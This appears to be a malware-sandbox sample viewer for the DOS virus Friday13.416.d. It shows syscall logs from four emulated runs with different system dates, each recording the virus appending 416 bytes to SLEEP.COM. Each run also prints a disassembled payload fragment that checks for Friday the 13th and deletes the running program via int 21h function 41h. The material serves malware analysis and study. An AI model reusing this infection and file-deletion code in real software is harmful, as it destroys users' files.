Sample viewer

vx.netlux.org/Virus.DOS.Friday13.416.d

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T21:50:29.663930063Z	26	PC: 12bce \| Set disk transfer address
2018-12-17T21:50:29.664989167Z	78	PC: 12bd7 \| Find first file
2018-12-17T21:50:29.668588667Z	61	PC: 12c0f \| Open file (Filename = 'SLEEP.COM')
2018-12-17T21:50:29.672423732Z	63	PC: 12c28 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:50:29.676510415Z	66	PC: 12c4b \| Move file pointer
2018-12-17T21:50:29.677434727Z	66	PC: 12c60 \| Move file pointer
2018-12-17T21:50:29.678273523Z	64	PC: 12c6c \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:50:29.680398982Z	66	PC: 12c79 \| Move file pointer
2018-12-17T21:50:29.681355128Z	64	PC: 12c85 \| Write file or device (Write 416 bytes on handle 5)
2018-12-17T21:50:29.686392897Z	62	PC: 12c96 \| Close file
2018-12-17T21:50:29.691827811Z	42	PC: 12c9d \| Get date 0x12c9d: cmp dl, 0xd 0x12ca0: jne 0x12cc4 0x12ca2: cmp al, 5 0x12ca4: jne 0x12cc4 0x12ca6: xor ax, ax 0x12ca8: mov cx, 0x7fff 0x12cab: xor di, di 0x12cad: mov es, word ptr es:[0x2c] 0x12cb2: cld 0x12cb3: repne scasd eax, dword ptr es:[di] 0x12cb5: jne 0x12cc4 0x12cb7: add di, 2 0x12cba: push ds 0x12cbb: push es 0x12cbc: pop ds 0x12cbd: mov ah, 0x41 0x12cbf: mov dx, di 0x12cc1: int 0x21 0x12cc3: pop ds 0x12cc4: pop es

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:33:23.865525097Z	26	PC: 12bce \| Set disk transfer address
2018-12-25T11:33:23.867896924Z	78	PC: 12bd7 \| Find first file
2018-12-25T11:33:23.876249806Z	61	PC: 12c0f \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:33:23.884734051Z	63	PC: 12c28 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:33:23.89390926Z	66	PC: 12c4b \| Move file pointer
2018-12-25T11:33:23.895998216Z	66	PC: 12c60 \| Move file pointer
2018-12-25T11:33:23.897966379Z	64	PC: 12c6c \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:33:23.901795617Z	66	PC: 12c79 \| Move file pointer
2018-12-25T11:33:23.904255703Z	64	PC: 12c85 \| Write file or device (Write 416 bytes on handle 5)
2018-12-25T11:33:23.920141555Z	62	PC: 12c96 \| Close file
2018-12-25T11:33:23.929686137Z	42	PC: 12c9d \| Get date 0x12c9d: cmp dl, 0xd 0x12ca0: jne 0x12cc4 0x12ca2: cmp al, 5 0x12ca4: jne 0x12cc4 0x12ca6: xor ax, ax 0x12ca8: mov cx, 0x7fff 0x12cab: xor di, di 0x12cad: mov es, word ptr es:[0x2c] 0x12cb2: cld 0x12cb3: repne scasd eax, dword ptr es:[di] 0x12cb5: jne 0x12cc4 0x12cb7: add di, 2 0x12cba: push ds 0x12cbb: push es 0x12cbc: pop ds 0x12cbd: mov ah, 0x41 0x12cbf: mov dx, di 0x12cc1: int 0x21 0x12cc3: pop ds 0x12cc4: pop es

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:37:42.426468934Z	26	PC: 12bce \| Set disk transfer address
2018-12-25T11:37:42.427554375Z	78	PC: 12bd7 \| Find first file
2018-12-25T11:37:42.430880981Z	61	PC: 12c0f \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:37:42.434281368Z	63	PC: 12c28 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:37:42.438009339Z	66	PC: 12c4b \| Move file pointer
2018-12-25T11:37:42.438886313Z	66	PC: 12c60 \| Move file pointer
2018-12-25T11:37:42.4396786Z	64	PC: 12c6c \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:37:42.441557997Z	66	PC: 12c79 \| Move file pointer
2018-12-25T11:37:42.442475366Z	64	PC: 12c85 \| Write file or device (Write 416 bytes on handle 5)
2018-12-25T11:37:42.447170871Z	62	PC: 12c96 \| Close file
2018-12-25T11:37:42.452253469Z	42	PC: 12c9d \| Get date 0x12c9d: cmp dl, 0xd 0x12ca0: jne 0x12cc4 0x12ca2: cmp al, 5 0x12ca4: jne 0x12cc4 0x12ca6: xor ax, ax 0x12ca8: mov cx, 0x7fff 0x12cab: xor di, di 0x12cad: mov es, word ptr es:[0x2c] 0x12cb2: cld 0x12cb3: repne scasd eax, dword ptr es:[di] 0x12cb5: jne 0x12cc4 0x12cb7: add di, 2 0x12cba: push ds 0x12cbb: push es 0x12cbc: pop ds 0x12cbd: mov ah, 0x41 0x12cbf: mov dx, di 0x12cc1: int 0x21 0x12cc3: pop ds 0x12cc4: pop es

{"DateBased":true,"Day":13,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:39:44.432580506Z	26	PC: 12bce \| Set disk transfer address
2018-12-25T11:39:44.434769911Z	78	PC: 12bd7 \| Find first file
2018-12-25T11:39:44.44135597Z	61	PC: 12c0f \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:39:44.449197045Z	63	PC: 12c28 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:39:44.456143748Z	66	PC: 12c4b \| Move file pointer
2018-12-25T11:39:44.457930816Z	66	PC: 12c60 \| Move file pointer
2018-12-25T11:39:44.459377228Z	64	PC: 12c6c \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:39:44.462161566Z	66	PC: 12c79 \| Move file pointer
2018-12-25T11:39:44.469132448Z	64	PC: 12c85 \| Write file or device (Write 416 bytes on handle 5)
2018-12-25T11:39:44.641968336Z	62	PC: 12c96 \| Close file
2018-12-25T11:39:44.657425726Z	42	PC: 12c9d \| Get date 0x12c9d: cmp dl, 0xd 0x12ca0: jne 0x12cc4 0x12ca2: cmp al, 5 0x12ca4: jne 0x12cc4 0x12ca6: xor ax, ax 0x12ca8: mov cx, 0x7fff 0x12cab: xor di, di 0x12cad: mov es, word ptr es:[0x2c] 0x12cb2: cld 0x12cb3: repne scasd eax, dword ptr es:[di] 0x12cb5: jne 0x12cc4 0x12cb7: add di, 2 0x12cba: push ds 0x12cbb: push es 0x12cbc: pop ds 0x12cbd: mov ah, 0x41 0x12cbf: mov dx, di 0x12cc1: int 0x21 0x12cc3: pop ds 0x12cc4: pop es
2018-12-25T11:39:44.66106664Z	65	PC: 12cc3 \| Delete file (Filename = '')